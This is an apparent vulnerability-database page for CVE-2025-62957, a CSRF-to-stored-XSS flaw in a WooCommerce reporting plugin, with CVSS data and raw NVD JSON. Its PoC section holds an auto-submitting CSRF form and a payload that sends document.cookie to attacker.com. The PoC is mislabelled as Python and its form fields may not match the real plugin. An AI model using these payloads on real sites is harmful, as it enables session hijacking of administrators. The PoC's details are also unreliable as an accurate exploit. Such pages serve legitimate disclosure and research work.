Security Vulnerability Report
中文
CVE-2025-62957 CVSS 7.1 HIGH

CVE-2025-62957

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-27 17:16:38

Description

Cross-Site Request Forgery (CSRF) vulnerability in NikanWP NikanWP WooCommerce Reporting wc-reports-lite allows Stored XSS.This issue affects NikanWP WooCommerce Reporting: from n/a through <= 1.0.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

NikanWP WooCommerce Reporting wc-reports-lite <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62957 --> <!-- Stored XSS via wc-reports-lite plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack - CVE-2025-62957</title> </head> <body> <h1>CSRF PoC for NikanWP WooCommerce Reporting</h1> <p>This PoC demonstrates the CSRF vulnerability that leads to stored XSS.</p> <form action="http://target-site/wp-admin/admin.php?page=wc-reports-lite" method="POST" id="csrf-form"> <input type="hidden" name="report_name" value="test_report"> <input type="hidden" name="report_data" value="<script>alert('XSS Vulnerability - CVE-2025-62957')</script>"> <input type="hidden" name="action" value="save_report"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit form to exploit CSRF vulnerability document.getElementById('csrf-form').submit(); // Advanced payload for session hijacking var stealCookiePayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; console.log('CSRF PoC loaded - Form will auto-submit'); </script> <p>If you see this, the form was submitted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62957", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.043", "lastModified": "2026-04-27T17:16:37.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in NikanWP NikanWP WooCommerce Reporting wc-reports-lite allows Stored XSS.This issue affects NikanWP WooCommerce Reporting: from n/a through <= 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wc-reports-lite/vulnerability/wordpress-nikanwp-woocommerce-reporting-plugin-1-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}